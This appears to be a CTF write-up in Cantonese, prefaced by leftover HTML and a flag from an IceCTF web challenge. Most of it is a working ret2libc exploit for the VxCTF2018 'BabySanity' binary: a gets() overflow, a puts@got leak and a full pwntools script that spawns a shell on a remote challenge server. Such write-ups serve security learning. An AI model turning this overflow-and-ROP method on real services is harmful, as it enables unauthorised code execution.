<a class="btn-floating btn-large waves-effect waves-light cyan comment-btn modal-trigger" href="#comment-modal" data-id="2"><i class="material-icons">comment</i></a>

<div class="card-content">
<h5>The IceCTF Team Created The ENIAC!</h5>
<p>Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC! </p>
<p>There\'s no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".</p>
<p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p>
</div>
</div>
</div>
</div>

</div>


<footer class="page-footer grey darken-3">
<div class="container">
<div class="row">
<div class="col l6 s12">
<h5 class="white-text">About Me</h5>
<p class="grey-text text-lighten-4">I like blogging about images. I hope you join me on my journey of exploring the world with me!</p>
</div>
</div>
</div>
<div class="footer-copyright">
<div class="container">
Made with <a class="brown-text text-lighten-3" href="http://materializecss.com">Materialize</a>
</div>
</div>
</footer>

<div id="comment-modal" class="modal">
<nav class="cyan">
<div class="nav-wrapper">
<div class="left col s12 m5 l5">
<ul>
<li><a class="modal-action modal-close"><i class="material-icons">keyboard_backspace</i></a>
</li>

<li><a href="#!">Comment</a>
</li>
</ul>
</div>
<div class="col s12 m7 l7 hide-on-med-and-down">
<ul class="right">

<li><a class="modal-action modal-close comment-send"><i class=" material-icons">send</i></a>
</li>
</ul>
</div>

</div>
</nav>
<div class="modal-content">
<form id="comment-form" action="/comment" method="post">
<div class="input-field">
<textarea id="comment" class="materialize-textarea" length="500"></textarea>
<label for="comment">Comment</label>
</div>
<input type="hidden" name="postId" id="postId" value="2">
</form>
</div>
</div>
</div>



<!--Import jQuery before materialize.js-->
<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.1.min.js"></script>
<script type="text/javascript" src="/static/js/materialize.min.js"></script>
<script type="text/javascript" src="/static/js/init.js"></script>
<script type="text/javascript" src="/static/js/main.js"></script>
</body>
</html>

Flag

IceCTF{who_trusts_these_cookies_anyway?}

VxCTF2018-BabySanity

Question

Binary

sanity
libc-2.23.so

Solution

一見到有個.so 比賽果陣都放棄左了 , 呢題係完左之後2日先做番出黎

首先啦 , 基本動作 checksec先

Arch:    amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

之後扔入IDA睇下個Main先

/*
 * Decompiled main() of the challenge binary: print a banner, read one line
 * into a stack buffer with gets(), return.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char v4; // [sp+10h] [bp-70h]@1 -- 0x70 bytes below the saved rbp; the saved return address is a further 8 bytes up, which is where the exploit's 0x70+8 padding comes from

    puts("Sanity Check should be easy");
    fflush(_bss_start); /* decompiler's name for the stdout object in .bss, presumably */
    /* Unbounded read: nothing limits the input to the buffer, so a longer
     * line overwrites the saved rbp and return address.  fgets() with the
     * buffer size is the fix; a stack canary (checksec: none) would at
     * least abort before the corrupted return address is used. */
    gets(&v4);
    return 0;
}

Leak Function Address

首先試下點樣可以 trigger main行多次先

from pwn import *

p = process('sanity')
e = ELF('./sanity')

# First probe: does the program survive a return into main()?  The padding
# fills the 0x70-byte buffer plus the saved rbp, the return address then goes
# through the pop-rdi gadget and on to main().
# NOTE: `gadget` is not defined in this snippet (the later listings set it to
# 0x4006a3), and the recvuntil/sendline that deliver the payload are omitted
# here too; the "Output" block is what the author saw once it was sent.
payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(0x401000) #just for fill rdi
payload += p64(e.symbols['main'])
"""
Output:
Sanity Check should be easy
Sanity Check should be easy
"""

可以見到已經行左2次 , 咁如果我地將0x401000轉做一個function既地址會點?
最終係可以構做到變成puts(gotAddress)
例如想leak libc既main 可以

from pwn import *

p = process('sanity')
e = ELF('./sanity')

gadget = 0x4006a3 #pop rdi;ret;

# Turn the probe into an information leak: pop the GOT slot of
# __libc_start_main into rdi and call puts() on it, so the resolved libc
# address is printed; then return to main() for another round.
# Possible only because the binary has no PIE (fixed GOT/PLT addresses).
# The send/receive lines are again omitted from this snippet.
payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(e.got['__libc_start_main'])
payload += p64(e.plt['puts']) #puts(__libc_start_main_got)
payload += p64(e.symbols['main'])
"""
Output:
有堆亂碼 , 應該係address既hex string黎
Sanity Check should be easy
"""

咁我地試下leak puts既address啦 , 搵offset都方便d

from pwn import *

p = process('sanity')
e = ELF('./sanity')

gadget = 0x4006a3 #pop rdi;ret;
# NOTE: `libc` is not defined in this snippet; the full exploit loads it
# with ELF("./libc-2.23.so").
libc_puts_off = libc.symbols['puts']

# Leak the resolved address of puts() by calling puts() on its own GOT
# entry, then return to main() for a second line of input.
payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts']) #puts(puts_addr_got)
payload += p64(e.symbols['main'])

p.recvuntil("easy\n")
p.sendline(payload)

# The value comes back as raw little-endian bytes plus the "\n" puts() adds,
# hence the reversed-looking hex ending in 0a in the output below.
leaked = p.recvuntil("\n")
print leaked.encode('hex')
"""
Output:
90afab45ad7f0a
Sanity Check should be easy
"""

咁個puts address應該係7fad45abaf90 , 但係多左個0a又調轉左喎 , 咁format下佢 , 同埋計番個libc_base先

from pwn import *

p = process('sanity')
e = ELF('./sanity')

gadget = 0x4006a3 #pop rdi;ret;
# NOTE: `libc` is not defined in this snippet; the full exploit loads it
# with ELF("./libc-2.23.so").
libc_puts_off = libc.symbols['puts']

# Same leak as before: puts(puts@got), then back into main().
payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts']) #puts(puts_addr_got)
payload += p64(e.symbols['main'])

p.recvuntil("easy\n")
p.sendline(payload)

leaked = p.recvuntil("\n")
# Drop the trailing newline and zero-pad the 6 significant bytes to 8 so
# u64() can unpack the little-endian address.
leaked = u64(leaked[:-1].ljust(8,'\x00'))

libc_base = leaked - libc_puts_off
info("Libc base:" + hex(libc_base))
# NOTE(review): the base in the Output block (...5900) is not page-aligned,
# which usually means the puts offset did not come from the libc the local
# process actually loaded.  The final exploit targets the remote service
# with the provided libc-2.23.so, where the arithmetic should line up;
# worth checking which libc a local run maps before trusting its leak.
"""
Output:
[*] Libc base: 0x7f28573b5900
"""

咁之後就可以慢慢拎番 binsh 既offset 同埋system既offset , 加番libc base , 再做ROP

# NOTE(review): despite the "_off" / "_offset" names these hold absolute
# addresses (libc base already added).  The full exploit below keeps the
# bare offsets under the same names and adds libc_base_addr when it builds
# the payload — copy from one listing or the other, not both.
libc_system_off = libc_base + libc.symbols['system']
libc_binsh_offset = libc_base + next(libc.search('/bin/sh'))

ROP

  1. Buffer overflow

    pattern create 200 input
    r < input
    pattern search
  2. 搵ROPgadget (pop rdi; ret;)

    ROPgadget --binary sanity --only 'pop|ret'
  3. 砌積木

    buffer + gadget + binsh_addr + system_addr

Full exploit code

from pwn import *

# Two-stage ROP against the `sanity` binary.  Stage 1 leaks the runtime
# address of puts() via its GOT entry and derives the libc base; stage 2
# returns into system("/bin/sh") at the derived addresses.  Every
# hard-coded address below (gadget, PLT, GOT, main) is usable only because
# the binary has no PIE; a stack canary would have stopped the overwrite at
# the first return; and the gets() in main() is what allows it at all.

#p = process("./sanity")
p = remote("35.185.151.73",8044)

libc = ELF("./libc-2.23.so")  # libc shipped with the challenge; the offsets below come from it
e = ELF('./sanity')

libc_system_off = libc.symbols['system']
libc_puts_off = libc.symbols['puts']
libc_binsh_offset = next(libc.search('/bin/sh'))
gadget = 0x4006a3  # pop rdi; ret (found with ROPgadget, see above)

info("libc system offset: " + hex(libc_system_off))
info("libc /bin/sh offset: " + hex(libc_binsh_offset))
info("libc puts offset: " + hex(libc_puts_off))

# Stage 1: fill the 0x70-byte buffer and saved rbp, then puts(puts@got)
# prints the resolved address; return to main() so a second line is read.
payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.symbols['main'])

p.recvuntil("Sanity Check should be easy\n")
p.sendline(payload)

# puts() stops at the first NUL byte and appends "\n": strip the newline
# and zero-pad the 6 significant bytes to 8 before unpacking little-endian.
leaked = p.recvuntil("\n")
leaked = u64(leaked[:-1].ljust(8,'\x00'))
libc_base_addr = leaked - libc_puts_off

info("leaked puts: " + hex(leaked))
info("libc base: " + hex(libc_base_addr))

# Stage 2 (main() prints its banner again first): system("/bin/sh") through
# the same pop-rdi gadget, with base + offset computed at runtime.
p.recvuntil("\n")
payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(libc_base_addr + libc_binsh_offset)
payload += p64(libc_base_addr + libc_system_off)

p.sendline(payload)
p.interactive()